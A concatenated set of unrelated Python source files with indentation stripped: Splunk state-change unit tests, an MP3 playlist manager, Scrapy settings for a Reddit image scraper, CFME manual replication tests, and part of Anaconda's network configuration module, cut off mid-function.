self.assertEqual(stateChange.output_results[-1], {'_time':'1', 'eventtype':'nodeStateList', 'StateName_SYS':'n[1,5-6]', 'StateName_ERR': 'n[2-4]'})
class DefaultStateTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.output_results = []
stateChange.options['addAggregate'] = False
def test_store_current_state(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.node_states, {'n1':'ERR'})
def test_get_current_state(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.get_current_state('n1'), 'ERR')
def test_get_current_state_with_does_not_exist(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.get_current_state('n2'), None)
def test_update_output_results_should_produce_output_since_state_is_assumed(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}])
def test_update_output_results_should_produce_output_since_state_is_assumed_2(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}])
def test_update_output_results_should_produce_output_only_if_state_changed_or_has_to_be_assumed(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n2'}, 'n2', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n2'}, 'n2', 'SYS', 'ERR')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}, {'nids':'n2', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':2, 'USR':0}, {'nids':'n2', '_time': None, 'nodeStateChange':'SYS-ERR', 'ERR':1, 'SYS':1}])
suite1 = unittest.TestLoader().loadTestsFromTestCase(DefaultStateTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(AggregateEventsTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(TriggerEventsTestCase)
suite4 = unittest.TestLoader().loadTestsFromTestCase(RSVSTARTTestCase)
unittest.TextTestRunner(verbosity=2).run(suite4)
|
import eyeD3
import os
import json
import pyglet
import random
import time
class Song():
""" A single song
"""
def __init__(self, collection_path):
""" Init a song
@param collectionpath: The path containing the music collection
"""
self.collection_path = collection_path
self.meta = {}
self.source = None
self.player = None
def play(self):
""" Play the song
http://guzalexander.com/2012/08/17/playing-a-sound-with-python.html
"""
self.source = pyglet.media.load(os.path.join(self.collection_path, self.meta["Filename"]))
self.player = pyglet.media.Player()
self.player.queue(self.source)
self.player.play()
pyglet.app.run()
# on ubuntu install libavbin0
def stop(self):
""" Stop a Song
"""
print ("Stopping")
if not self.player is None:
self.player.stop()
def pause(self):
""" Pause a Song
"""
if not self.player is None:
self.player.pause()
def from_data(self, data):
""" Create a song from data
@param data: A dict in meta style
"""
self.meta = data
def from_file(self, filename):
""" Generate entry from a mp3 file
@param filename: The file name relative to the collection path
"""
fullname = os.path.join(self.collection_path, filename)
if eyeD3.isMp3File(fullname):
audioFile = eyeD3.Mp3AudioFile(fullname)
tag = audioFile.getTag()
if tag:
self.meta["Error"] = None
self.meta["Album"] = tag.getAlbum().encode("utf-8")
self.meta["Artist"] = tag.getArtist().encode("utf-8")
self.meta["DiscNum"] = tag.getDiscNum()[0]
self.meta["DiscNumMax"] = tag.getDiscNum()[1]
try:
if tag.getGenre():
self.meta["Genre"] = tag.getGenre().getName().encode("utf-8")
except eyeD3.tag.GenreException:
self.meta["Error"] = "Broken Genre"
pass # Genre string cannot be parsed with '^([A-Z 0-9+/\-\|!&'\.]+)([,;|][A-Z 0-9+/\-\|!&'\.]+)*$': Hörbuch für Kinder
self.meta["Title"] = tag.getTitle().encode("utf-8")
#self.meta["Images"] = tag.getImages()
self.meta["TrackNum"] = tag.getTrackNum()[0]
self.meta["TrackNumMax"] = tag.getTrackNum()[1]
#self.meta["Urls"] = tag.getURLs()
self.meta["Year"] = tag.getYear()
#self.meta["FileIDs"] = tag.getUniqueFileIDs()
self.meta["Filename"] = filename
def __str__(self):
""" Print the song
"""
res = ""
for key in self.meta:
res += "%s %s \n" %(key, self.meta[key])
return res
def get_data(self):
""" Return the meta data
"""
return self.meta
class Playlist():
""" A playlist of several songs
"""
def __init__(self, collection_path, album = None, pid = None):
"""
@param collection_path: Path where the whole collection is stored
@param pid: Playlist id
@param album: The album name as id. Collisions are possible !
"""
self.collection_path = collection_path
self.data = {"songs":[],
"album": album,
"pid": pid}
def get_pid(self):
""" Return Playlist ID
"""
return self.data["pid"]
def create_card(self):
""" Create a card
"""
# Todo Create and print a card
pass
def add_song(self, song):
""" Add a song
"""
self.data["songs"].append(song)
# TODO Sort titles in album by Track number
def load_from_data(self):
""" Load from db file
"""
# TODO: Maybe ? Load a playlist from data
pass
def get_data(self):
""" return data in playlist
"""
res = {"album": self.data["album"],
"pid": self.data["pid"],
"songs": []}
for song in self.data["songs"]:
res["songs"].append(song.get_data())
return res
def from_data(self, data):
""" Generate a playlist from dumped data
"""
self.data = {"album": data["album"],
"pid": data["pid"],
"songs":[]}
for s in data["songs"]:
news = Song(self.collection_path)
news.from_data(s)
self.add_song(news)
class Playlists():
""" All playlists available
"""
def __init__(self, collection_path, filename = None):
"""
@param collection_path: Path where the collection is stored
@param filename: Filename of the DB to store in
"""
self.collection_path = collection_path
self.playlists = {} # id:playlist
self.filename = filename
def load_from_file(self, filename=None):
""" Load playlists from json file
@param: Json db filename. If none, taken from the central object name
"""
if filename is None:
filename = self.filename
with open(filename) as fh:
data = json.load(fh)
for pl in data:
newpl = Playlist(self.collection_path)
newpl.from_data(pl)
self.playlists[newpl.get_pid()] = newpl
def save_to_file(self, filename = None):
""" Save Playlist to json file
@param,filename: Filename for the playlist. If None it is taken from playlist central
"""
if filename is None:
filename = self.filename
sdata = []
for pl in self.playlists:
sdata.append(self.playlists[pl].get_data())
with open(filename, "wt") as fh:
json.dump(sdata, fh, indent = 4)
def get_playlist_by_id(self, pid):
""" Get a playlist by id
@param pid: playlist id
"""
if pid in self.playlists:
return self.playlists[pid]
return None
def get_playlist_by_album(self, album):
""" Get playlist by album title
@param album: album name
"""
for pid in self.playlists:
pl = self.playlists[pid]
if pl.data["album"] == album:
return pl
return None
def generate_new_id(self):
""" Generate a new random, unused id
"""
# TODO: create track ID in 8 Byte style for punchcard holes
r = random.randint(0,10000)
while (self.get_playlist_by_id(r)):
r = random.randint(0,10000)
return r
def new_playlist(self, album = None):
""" Create a new playlist
@param album: Album that is the base for this playlist
"""
pid = self.generate_new_id()
p = Playlist(album = album, pid = pid)
self.playlists[pid] = p
p.album = album
return p
def album_playlist_from_song_db(self, songdb):
""" Take a song db and create all album playlists
@param songdb: The song database class. Albums will be extracted
"""
for song in songdb.db:
try:
al = song.meta["Album"]
except:
pass
else:
pl = self.get_playlist_by_album(al)
if not pl:
pl = self.new_playlist(album = al)
pl.add_song(song)
def __str__(self):
res = ""
res += "Playlists in db: %d" % len(self.playlists)
return res
class SongDB():
""" A List of all songs
"""
def __init__(self, basedir, filename, new = False):
"""
@param basedir: The dir of the collection
@param filename: The name of the json db
@param new: Create new db vs load
"""
self.filename = filename
self.basedir = basedir
if new:
self.db = self.create_new()
else:
self.db = self.load()
def load(self, filename=None):
""" Load song db from json file
@param filename: Filename for loading. If None it will be the central class filename
"""
res = []
if filename is None:
filename = self.filename
with open(filename) as fh:
data = json.load(fh)
for sdata in data:
s = Song(self.basedir)
s.from_data(sdata)
res.append(s)
return res
def create_new(self):
return []
def update_from_dir(self):
""" Update the current database from MP3 files in the directory
"""
for subdir, dirs, files in os.walk(self.basedir):
for file in files:
fullpath = os.path.join(subdir, file)
relpath = os.path.relpath(fullpath, self.basedir)
s = Song(self.basedir)
s.from_file(relpath)
self.db.append(s)
print (len(self.db))
def save(self, filename=None):
""" Save playlist to json file
@param filename: Filename for the db. If None, it will be the central class name
"""
if filename is None:
filename = self.filename
data = []
for asong in self.db:
data.append(asong.get_data())
with open(filename, "wt") as fh:
json.dump(data, fh, indent = 4)
def __str__(self):
res = ""
res += str(len(self.db))
return res
if __name__ == "__main__":
sdb = SongDB("/home/thorsten/Musik", "test.json", False)
print (sdb)
song = sdb.db[0]
song.play()
time.sleep(2)
song.stop()
#sdb.update_from_dir()
#sdb.save()
#sdb.cards()
#p = Playlists("/home/thorsten/Musik", filename="playlist.json")
#p.album_playlist_from_song_db(sdb)
#p.load_from_file()
#print(p)
#p.save_to_file()
|
VERSION = (0, 3)
__version__ = ".".join(map(str, VERSION[0:2])) + "".join(VERSION[2:])
__license__ = "BSD"
from pyfttt.sending import *
|
from pathlib import Path
BOT_NAME = 'reddit_scrapers'
SPIDER_MODULES = ['reddit_scrapers.spiders']
NEWSPIDER_MODULE = 'reddit_scrapers.spiders'
ROBOTSTXT_OBEY = True
DOWNLOAD_DELAY = 7
ITEM_PIPELINES = {
'scrapy.pipelines.images.ImagesPipeline': 1
}
IMAGES_STORE = str(Path.home())+'/EarthPorn'
IMAGES_EXPIRES = None
MEDIA_ALLOW_REDIRECTS = True
|
"""
Classes concernant le L{Dispatchator<base.Dispatchator>}. Seule L{la factory
<factory.make_dispatchator>} est directement accessible au niveau du module.
"""
from __future__ import absolute_import
from vigilo.vigiconf.lib.dispatchator.factory import make_dispatchator
__all__ = ("make_dispatchator", )
|
"""Manual tests"""
import pytest
from cfme import test_requirements
@pytest.mark.manual
@test_requirements.settings
@pytest.mark.tier(3)
def test_validate_landing_pages_for_rbac():
"""
Bugzilla:
1450012
Polarion:
assignee: pvala
casecomponent: Settings
caseimportance: medium
initialEstimate: 1/5h
setup:
1. Create a new role by selecting a few product features.
2. Create a group with the new role.
3. Create a new user with the new group.
4. Logout.
5. Login back with the new user.
6. Navigate to My Settings > Visual.
testSteps:
1.Check the start page entries in `Show at login` dropdown list
expectedResults:
1. Landing pages which user has access to must be present in the dropdown list.
"""
pass
@pytest.mark.manual
@test_requirements.configuration
@pytest.mark.tier(1)
def test_configure_icons_roles_by_server():
"""
Polarion:
assignee: tpapaioa
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/15h
testSteps:
1. Go to Settings -> Configuration and enable all Server Roles.
2.Navigate to Settings -> Configuration -> Diagnostics -> CFME Region ->
Roles by Servers.
3. Click through all Roles and look for missing icons.
expectedResults:
1.
2.
3. No icons are missing
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_replication_subscription_crud():
"""
Add/Edit/Remove replication subscription
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: critical
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try adding subscription to second appliance with wrong password in first appliance
6. Update not working subscription to use correct password
7. Delete subscription
expectedResults:
1.
2.
3.
4.
5. Subscription was added. User was prewarned that subscription wasn't established.
Provider didn't show up in global appliance.
6. Provider and its data showed up in global region appliance
7. Subscription was deleted. Provider and its data disappeared from global region
appliance.
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_add_duplicate_subscription():
"""
Try adding duplicate record
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
caseposneg: negative
initialEstimate: 1/6h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
6. Try adding second subscription to second appliance in first appliance
expectedResults:
1.
2.
3.
4.
5.
6. Second subscription hasn't been added. Warning message has appeared
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_add_bad_subscription():
"""
Try adding wrong subscriptions like
1. remote appliance does have remote replication type set
2. remote appliance isn't available and etc
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try adding subscription to second appliance in first appliance with wrong values
expectedResults:
1.
2.
3.
4.
5. Subscription hasn't been added. Add subscription task has failed
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_edit_bad_subscription():
"""
Try changing subscriptions from good to bad or vise versa
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try changing existing subscription values to wrong ones. f.e wrong password
expectedResults:
1.
2.
3.
4.
5. Subscription shouldn't be changed if connection couldn't be established.
Subscription update task should fail
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_cancel_subscription():
"""
Try canceling adding/changing/removing subscriptions
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try canceling adding/changing/removing subscription
expectedResults:
1.
2.
3.
4.
5. made changes should be canceled
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_change_subscription_type():
"""
Try setting/removing global/remote subscription
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance
6. Change subscription type from Global to None
7. Restore Global subscription type and subscription to remote appliance
8. Change Remote subscription type to None
9. Restore Remote subscription type
expectedResults:
1.
2.
3.
4.
5.
6.
7.
8.
9. remote appliance data should disappear from global appliance when Global or Remote
subscription type are changed to None.
remote appliance data should appear again when Global and Remote subscription types
are set
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_subscription_disruption():
"""
Test restoring subscription after temporary disruptions
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: medium
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
6. Add some disruption in connection between global and remote appliances
f.e. add iptables rule to reject packets from one appliance to another one
7. Try provisioning vm from global appliance
8. Make some noticeable changes in remote appliance's provider
9. Remove disruption
10. Try provisioning vm again
expectedResults:
1.
2.
3.
4.
5.
6.
7. Vm was not provisioned. error/warning should clearly describe the reason
8.
9. subscription was restored. Vm was provisioned. Changes made in remote appliance
appeared in global appliance
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.meta(coverage=[1741240])
@pytest.mark.tier(3)
def test_subscription_region_unavailable():
"""
Tests that Replication tab is open w/o issues and 502 error when
remote region has become unavailable
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: high
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
6. Stop postgresql service in remote appliance
7. Go to Configuration->Settings-><Current Region>->Replication tab
expectedResults:
1.
2.
3.
4.
5.
6.
7. Replication tab is being opened for long time and finally displays 502 error alert
"""
pass
|
import gi
gi.require_version("NetworkManager", "1.0")
from gi.repository import NetworkManager
import shutil
from pyanaconda import iutil
import socket
import os
import time
import threading
import re
import dbus
import ipaddress
from uuid import uuid4
import itertools
import glob
from pyanaconda.simpleconfig import SimpleConfigFile
from blivet.devices import FcoeDiskDevice
import blivet.arch
from pyanaconda import nm
from pyanaconda import constants
from pyanaconda.flags import flags, can_touch_runtime_system
from pyanaconda.i18n import _
from pyanaconda.regexes import HOSTNAME_PATTERN_WITHOUT_ANCHORS
import logging
log = logging.getLogger("anaconda")
sysconfigDir = "/etc/sysconfig"
netscriptsDir = "%s/network-scripts" % (sysconfigDir)
networkConfFile = "%s/network" % (sysconfigDir)
hostnameFile = "/etc/hostname"
ipv6ConfFile = "/etc/sysctl.d/anaconda.conf"
ifcfgLogFile = "/tmp/ifcfg.log"
DEFAULT_HOSTNAME = "localhost.localdomain"
ifcfglog = None
network_connected = None
network_connected_condition = threading.Condition()
def setup_ifcfg_log():
# Setup special logging for ifcfg NM interface
from pyanaconda import anaconda_log
global ifcfglog
logger = logging.getLogger("ifcfg")
logger.setLevel(logging.DEBUG)
anaconda_log.logger.addFileHandler(ifcfgLogFile, logger, logging.DEBUG)
anaconda_log.logger.forwardToSyslog(logger)
ifcfglog = logging.getLogger("ifcfg")
def check_ip_address(address, version=None):
"""
Check if the given IP address is valid in given version if set.
:param str address: IP address for testing
:param int version: ``4`` for IPv4, ``6`` for IPv6 or
``None`` to allow either format
:returns: ``True`` if IP address is valid or ``False`` if not
:rtype: bool
"""
try:
if version == 4:
ipaddress.IPv4Address(address)
elif version == 6:
ipaddress.IPv6Address(address)
elif not version: # any of those
ipaddress.ip_address(address)
else:
log.error("IP version %s is not supported", version)
return False
return True
except ValueError:
return False
def sanityCheckHostname(hostname):
"""
Check if the given string is (syntactically) a valid hostname.
:param hostname: a string to check
:returns: a pair containing boolean value (valid or invalid) and
an error message (if applicable)
:rtype: (bool, str)
"""
if not hostname:
return (False, _("Host name cannot be None or an empty string."))
if len(hostname) > 255:
return (False, _("Host name must be 255 or fewer characters in length."))
if not (re.match('^' + HOSTNAME_PATTERN_WITHOUT_ANCHORS + '$', hostname)):
return (False, _("Host names can only contain the characters 'a-z', "
"'A-Z', '0-9', '-', or '.', parts between periods "
"must contain something and cannot start or end with "
"'-'."))
return (True, "")
def getIPs():
""" Return a list of IP addresses for all active devices. """
ipv4_addresses = []
ipv6_addresses = []
for devname in nm.nm_activated_devices():
try:
ipv4_addresses += nm.nm_device_ip_addresses(devname, version=4)
ipv6_addresses += nm.nm_device_ip_addresses(devname, version=6)
except (dbus.DBusException, ValueError) as e:
log.warning("Got an exception trying to get the ip addr "
"of %s: %s", devname, e)
# prefer IPv4 addresses to IPv6 addresses
return ipv4_addresses + ipv6_addresses
def getFirstRealIP():
""" Return the first real non-local IP we find from the list of
all active devices.
:rtype: str or ``None``
"""
for ip in getIPs():
if ip not in ("127.0.0.1", "::1"):
return ip
return None
def netmask2prefix(netmask):
""" Convert netmask to prefix (CIDR bits) """
prefix = 0
while prefix < 33:
if (prefix2netmask(prefix) == netmask):
return prefix
prefix += 1
return prefix
def prefix2netmask(prefix):
""" Convert prefix (CIDR bits) to netmask """
_bytes = []
for _i in range(4):
if prefix >= 8:
_bytes.append(255)
prefix -= 8
else:
_bytes.append(256 - 2**(8-prefix))
prefix = 0
netmask = ".".join(str(byte) for byte in _bytes)
return netmask
def getHostname():
""" Try to determine what the hostname should be for this system """
hn = None
# First address (we prefer ipv4) of last device (as it used to be) wins
for dev in nm.nm_activated_devices():
addrs = (nm.nm_device_ip_addresses(dev, version=4) +
nm.nm_device_ip_addresses(dev, version=6))
for ipaddr in addrs:
try:
hinfo = socket.gethostbyaddr(ipaddr)
except socket.herror as e:
log.debug("Exception caught trying to get host name of %s: %s", ipaddr, e)
else:
if len(hinfo) == 3:
hn = hinfo[0]
break
if not hn or hn in ('(none)', 'localhost', 'localhost.localdomain'):
hn = socket.gethostname()
if not hn or hn in ('(none)', 'localhost', 'localhost.localdomain'):
hn = DEFAULT_HOSTNAME
return hn
def logIfcfgFile(path, message=""):
""" Log content of network ifcfg file.
:param str path: path to the ifcfg file
:param str message: optional message appended to the log
"""
content = ""
if os.access(path, os.R_OK):
f = open(path, 'r')
content = f.read()
f.close()
else:
content = "file not found"
ifcfglog.debug("%s%s:\n%s", message, path, content)
def _ifcfg_files(directory):
rv = []
for name in os.listdir(directory):
if name.startswith("ifcfg-"):
if name == "ifcfg-lo":
continue
rv.append(os.path.join(directory, name))
return rv
def logIfcfgFiles(message=""):
""" Log contents of all network ifcfg files.
:param str message: append message to the log
"""
ifcfglog.debug("content of files (%s):", message)
for path in _ifcfg_files(netscriptsDir):
ifcfglog.debug("%s:", path)
with open(path, "r") as f:
for line in f:
ifcfglog.debug(" %s", line.strip())
ifcfglog.debug("all settings: %s", nm.nm_get_all_settings())
class IfcfgFile(SimpleConfigFile):
def __init__(self, filename):
SimpleConfigFile.__init__(self, always_quote=True, filename=filename)
self._dirty = False
def read(self, filename=None):
self.reset()
ifcfglog.debug("IfcfFile.read %s", self.filename)
SimpleConfigFile.read(self)
self._dirty = False
def write(self, filename=None, use_tmp=False):
if self._dirty or filename:
# ifcfg-rh is using inotify IN_CLOSE_WRITE event so we don't use
# temporary file for new configuration
ifcfglog.debug("IfcfgFile.write %s:\n%s", self.filename, self.__str__())
SimpleConfigFile.write(self, filename, use_tmp=use_tmp)
self._dirty = False
def set(self, *args):
for (key, data) in args:
if self.get(key) != data:
break
else:
return
ifcfglog.debug("IfcfgFile.set %s: %s", self.filename, args)
SimpleConfigFile.set(self, *args)
self._dirty = True
def unset(self, *args):
for key in args:
if self.get(key):
self._dirty = True
break
else:
return
ifcfglog.debug("IfcfgFile.unset %s: %s", self.filename, args)
SimpleConfigFile.unset(self, *args)
def dumpMissingDefaultIfcfgs():
"""
Dump missing default ifcfg file for wired devices.
For default auto connections created by NM upon start - which happens
in case of missing ifcfg file - rename the connection using device name
and dump its ifcfg file. (For server, default auto connections will
be turned off in NetworkManager.conf.)
The connection id (and consequently ifcfg file) is set to device name.
:return: list of devices for which ifcfg file was dumped.
"""
rv = []
for devname in nm.nm_devices():
# for each ethernet device
# FIXME add more types (infiniband, bond...?)
if not nm.nm_device_type_is_ethernet(devname):
continue
# check that device has connection without ifcfg file
try:
nm.nm_device_setting_value(devname, "connection", "uuid")
except nm.SettingsNotFoundError:
continue
if find_ifcfg_file_of_device(devname):
continue
try:
nm.nm_update_settings_of_device(devname, [['connection', 'id', devname, None]])
log.debug("network: dumping ifcfg file for default autoconnection on %s", devname)
except nm.SettingsNotFoundError:
log.debug("network: no ifcfg file for %s", devname)
rv.append(devname)
return rv
def dracutSetupArgs(networkStorageDevice):
if networkStorageDevice.nic == "default" or ":" in networkStorageDevice.nic:
if getattr(networkStorageDevice, 'ibft', False):
nic = ibftIface()
else:
nic = ifaceForHostIP(networkStorageDevice.host_address)
if not nic:
return ""
else:
nic = networkStorageDevice.nic
if nic not in nm.nm_devices():
log.error('Unknown network interface: %s', nic)
return ""
ifcfg_path = find_ifcfg_file_of_device(nic)
if not ifcfg_path:
log.error("dracutSetupArgs: can't find ifcfg file for %s", nic)
return ""
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
return dracutBootArguments(nic,
ifcfg,
networkStorageDevice.host_address,
getHostname())
def dracutBootArguments(devname, ifcfg, storage_ipaddr, hostname=None):
netargs = set()
if ifcfg.get('BOOTPROTO') == 'ibft':
netargs.add("ip=ibft")
elif storage_ipaddr:
if hostname is None:
hostname = ""
# if using ipv6
if ':' in storage_ipaddr:
if ifcfg.get('DHCPV6C') == "yes":
# XXX combination with autoconf not yet clear,
# support for dhcpv6 is not yet implemented in NM/ifcfg-rh
netargs.add("ip=%s:dhcp6" % devname)
elif ifcfg.get('IPV6_AUTOCONF') == "yes":
netargs.add("ip=%s:auto6" % devname)
elif ifcfg.get('IPV6ADDR'):
ipaddr = "[%s]" % ifcfg.get('IPV6ADDR')
if ifcfg.get('IPV6_DEFAULTGW'):
gateway = "[%s]" % ifcfg.get('IPV6_DEFAULTGW')
else:
gateway = ""
netargs.add("ip=%s::%s::%s:%s:none" % (ipaddr, gateway,
hostname, devname))
else:
if iutil.lowerASCII(ifcfg.get('bootproto')) == 'dhcp':
netargs.add("ip=%s:dhcp" % devname)
else:
cfgidx = ''
if ifcfg.get('IPADDR0'):
cfgidx = '0'
if ifcfg.get('GATEWAY%s' % cfgidx):
gateway = ifcfg.get('GATEWAY%s' % cfgidx)
else:
gateway = ""
netmask = ifcfg.get('NETMASK%s' % cfgidx)
prefix = ifcfg.get('PREFIX%s' % cfgidx)
if not netmask and prefix:
netmask = prefix2netmask(int(prefix))
ipaddr = ifcfg.get('IPADDR%s' % cfgidx)
netargs.add("ip=%s::%s:%s:%s:%s:none" %
(ipaddr, gateway, netmask, hostname, devname))
hwaddr = ifcfg.get("HWADDR")
if hwaddr:
netargs.add("ifname=%s:%s" % (devname, hwaddr.lower()))
if ifcfg.get("TYPE") == "Team" or ifcfg.get("DEVICETYPE") == "Team":
slaves = get_team_slaves([devname, ifcfg.get("UUID")])
netargs.add("team=%s:%s" % (devname,
",".join(dev for dev, _cfg in slaves)))
nettype = ifcfg.get("NETTYPE")
subchannels = ifcfg.get("SUBCHANNELS")
if blivet.arch.is_s390() and nettype and subchannels:
znet = "rd.znet=%s,%s" % (nettype, subchannels)
options = ifcfg.get("OPTIONS").strip("'\"")
if options:
options = filter(lambda x: x != '', options.split(' '))
znet += ",%s" % (','.join(options))
netargs.add(znet)
return netargs
def _get_ip_setting_values_from_ksdata(networkdata):
values = []
# ipv4 settings
method4 = "auto"
if networkdata.bootProto == "static":
method4 = "manual"
values.append(["ipv4", "method", method4, "s"])
if method4 == "manual":
addr4 = nm.nm_ipv4_to_dbus_int(networkdata.ip)
if networkdata.gateway:
gateway4 = nm.nm_ipv4_to_dbus_int(networkdata.gateway)
else:
gateway4 = 0 # will be ignored by NetworkManager
prefix4 = netmask2prefix(networkdata.netmask)
values.append(["ipv4", "addresses", [[addr4, prefix4, gateway4]], "aau"])
# ipv6 settings
if networkdata.noipv6:
method6 = "ignore"
else:
if not networkdata.ipv6:
method6 = "auto"
elif networkdata.ipv6 == "auto":
method6 = "auto"
elif networkdata.ipv6 == "dhcp":
method6 = "dhcp"
else:
method6 = "manual"
values.append(["ipv6", "method", method6, "s"])
if method6 == "manual":
addr6, _slash, prefix6 = networkdata.ipv6.partition("/")
if prefix6:
prefix6 = int(prefix6)
else:
prefix6 = 64
addr6 = nm.nm_ipv6_to_dbus_ay(addr6)
if networkdata.ipv6gateway:
gateway6 = nm.nm_ipv6_to_dbus_ay(networkdata.ipv6gateway)
else:
gateway6 = [0] * 16
values.append(["ipv6", "addresses", [(addr6, prefix6, gateway6)], "a(ayuay)"])
# nameservers
nss4 = []
nss6 = []
if networkdata.nameserver:
for ns in [str.strip(i) for i in networkdata.nameserver.split(",")]:
if check_ip_address(ns, version=6):
nss6.append(nm.nm_ipv6_to_dbus_ay(ns))
elif check_ip_address(ns, version=4):
nss4.append(nm.nm_ipv4_to_dbus_int(ns))
else:
log.error("IP address %s is not valid", ns)
values.append(["ipv4", "dns", nss4, "au"])
values.append(["ipv6", "dns", nss6, "aay"])
return values
def update_settings_with_ksdata(devname, networkdata):
new_values = _get_ip_setting_values_from_ksdata(networkdata)
new_values.append(['connection', 'autoconnect', networkdata.onboot, None])
uuid = nm.nm_device_setting_value(devname, "connection", "uuid")
nm.nm_update_settings_of_device(devname, new_values)
return uuid
def bond_options_ksdata_to_dbus(opts_str):
retval = {}
for option in opts_str.split(";" if ';' in opts_str else ","):
key, _sep, value = option.partition("=")
retval[key] = value
return retval
def add_connection_for_ksdata(networkdata, devname):
added_connections = []
con_uuid = str(uuid4())
values = _get_ip_setting_values_from_ksdata(networkdata)
# HACK preventing NM to autoactivate the connection
#values.append(['connection', 'autoconnect', networkdata.onboot, 'b'])
values.append(['connection', 'autoconnect', False, 'b'])
values.append(['connection', 'uuid', con_uuid, 's'])
# type "bond"
if networkdata.bondslaves:
# bond connection is autoactivated
values.append(['connection', 'type', 'bond', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['bond', 'interface-name', devname, 's'])
options = bond_options_ksdata_to_dbus(networkdata.bondopts)
values.append(['bond', 'options', options, 'a{ss}'])
for slave in networkdata.bondslaves.split(","):
suuid = _add_slave_connection('bond', slave, devname, networkdata.activate)
added_connections.append((suuid, slave))
dev_spec = None
# type "team"
elif networkdata.teamslaves:
values.append(['connection', 'type', 'team', 's'])
values.append(['connection', 'id', devname, 's'])
values.append(['team', 'interface-name', devname, 's'])
values.append(['team', 'config', networkdata.teamconfig, 's'])
for (slave, cfg) in networkdata.teamslaves:
svalues = [['team-port', 'config', cfg, 's']]
suuid = _add_slave_connection('team', slave, devname, networkdata.activate, svalues)
added_connections.append((suuid, slave))
dev_spec = None
# type "vlan"
elif networkdata.vlanid:
